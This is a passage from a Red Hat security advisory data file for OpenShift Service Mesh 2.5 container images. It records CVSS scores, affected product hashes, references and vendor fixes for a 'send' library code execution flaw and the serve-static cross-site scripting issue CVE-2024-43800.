"8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "send: Code Execution Vulnerability in Send Library", }, { cve: "CVE-2024-43800", cwe: { id: "CWE-79", name: "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')", }, discovery_date: "2024-09-10T15:30:33.631718+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2311154", }, ], notes: [ { category: "description", text: "A flaw was found in serve-static. This issue may allow the execution of untrusted code via passing sanitized yet untrusted user input to redirect().", title: "Vulnerability description", }, { category: "summary", text: "serve-static: Improper Sanitization in serve-static", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43800", }, { category: "external", summary: "RHBZ#2311154", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311154", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43800", url: "https://www.cve.org/CVERecord?id=CVE-2024-43800", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43800", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", url: "https://github.com/expressjs/serve-static/commit/0c11fad159898cdc69fd9ab63269b72468ecaf6b", }, { category: "external", summary: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", url: "https://github.com/expressjs/serve-static/commit/ce730896fddce1588111d9ef6fdf20896de5c6fa", }, { category: "external", summary: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", url: "https://github.com/expressjs/serve-static/security/advisories/GHSA-cm22-4g7w-348p", }, ], release_date: "2024-09-10T15:15:17.937000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:7725", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", 